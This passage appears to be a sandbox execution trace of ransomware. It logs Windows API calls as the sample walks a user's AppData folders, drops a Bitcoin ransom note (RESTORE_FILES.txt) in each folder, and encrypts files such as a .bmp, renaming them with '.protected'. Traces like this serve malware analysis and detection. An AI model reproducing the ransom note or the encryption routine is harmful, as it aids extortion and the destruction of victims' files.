cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\..") returned 75 [0090.417] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.417] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.417] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.417] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.417] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\RESTORE_FILES.txt") returned 90 [0090.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\startup\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.418] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.418] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.419] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.419] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.419] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.419] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0090.419] CloseHandle (hObject=0x14c) returned 1 [0090.419] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.419] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.419] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\RESTORE_FILES.txt") returned 82 [0090.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.420] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.420] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.420] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.420] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.420] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.420] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.420] CloseHandle (hObject=0xd8) returned 1 [0090.420] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0090.420] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0090.421] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RESTORE_FILES.txt") returned 77 [0090.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0090.421] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.421] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0090.422] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.422] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0090.422] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.422] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0090.422] CloseHandle (hObject=0xd4) returned 1 [0090.422] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0090.422] lstrcmpiW (lpString1="moMg3J.bmp", lpString2="Windows") returned -1 [0090.422] lstrcmpiW (lpString1="moMg3J.bmp", lpString2="Program Files") returned -1 [0090.422] lstrcmpiW (lpString1="moMg3J.bmp", lpString2="Program Files (x86)") returned -1 [0090.422] lstrcmpiW (lpString1="moMg3J.bmp", lpString2="$Recycle.bin") returned 1 [0090.422] lstrcmpiW (lpString1="moMg3J.bmp", lpString2="System Volume Information") returned -1 [0090.422] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp") returned 60 [0090.422] StrStrIW (lpFirst="moMg3J.bmp", lpSrch=".protected") returned 0x0 [0090.422] lstrcmpW (lpString1="moMg3J.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0090.422] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0090.422] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0090.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\momg3j.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0090.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp") returned 60 [0090.423] StrStrW (lpFirst="moMg3J.bmp", lpSrch=".txt") returned 0x0 [0090.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp") returned 60 [0090.423] StrStrW (lpFirst="moMg3J.bmp", lpSrch=".rar") returned 0x0 [0090.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp") returned 60 [0090.423] StrStrW (lpFirst="moMg3J.bmp", lpSrch=".zip") returned 0x0 [0090.423] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0090.423] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.423] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0090.424] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.424] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0090.424] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0090.424] CloseHandle (hObject=0xd4) returned 1 [0090.425] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp.protected") returned 70 [0090.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\momg3j.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\momg3j.bmp.protected")) returned 1 [0090.426] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0090.426] lstrcmpiW (lpString1="Mozilla", lpString2="Windows") returned -1 [0090.426] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files") returned -1 [0090.426] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files (x86)") returned -1 [0090.426] lstrcmpiW (lpString1="Mozilla", lpString2="$Recycle.bin") returned 1 [0090.426] lstrcmpiW (lpString1="Mozilla", lpString2="System Volume Information") returned -1 [0090.426] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla") returned 57 [0090.426] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0090.426] lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0090.426] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*") returned 59 [0090.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0090.426] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.426] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.426] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.426] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.426] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.426] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\.") returned 59 [0090.426] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.426] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.426] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.426] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.426] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.426] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.426] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.426] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\..") returned 60 [0090.426] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.426] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.427] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.427] lstrcmpiW (lpString1="Extensions", lpString2="Windows") returned -1 [0090.427] lstrcmpiW (lpString1="Extensions", lpString2="Program Files") returned -1 [0090.427] lstrcmpiW (lpString1="Extensions", lpString2="Program Files (x86)") returned -1 [0090.427] lstrcmpiW (lpString1="Extensions", lpString2="$Recycle.bin") returned 1 [0090.427] lstrcmpiW (lpString1="Extensions", lpString2="System Volume Information") returned -1 [0090.427] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions") returned 68 [0090.427] lstrcmpW (lpString1="Extensions", lpString2=".") returned 1 [0090.427] lstrcmpW (lpString1="Extensions", lpString2="..") returned 1 [0090.427] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned 70 [0090.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.427] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.428] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.428] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.428] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.428] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.428] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\.") returned 70 [0090.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.428] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.428] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.428] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.428] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.428] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.428] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.428] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\..") returned 71 [0090.428] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.428] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.428] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.428] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.428] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\RESTORE_FILES.txt") returned 86 [0090.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\extensions\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.428] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.429] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.429] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.429] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.429] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.429] WriteFile 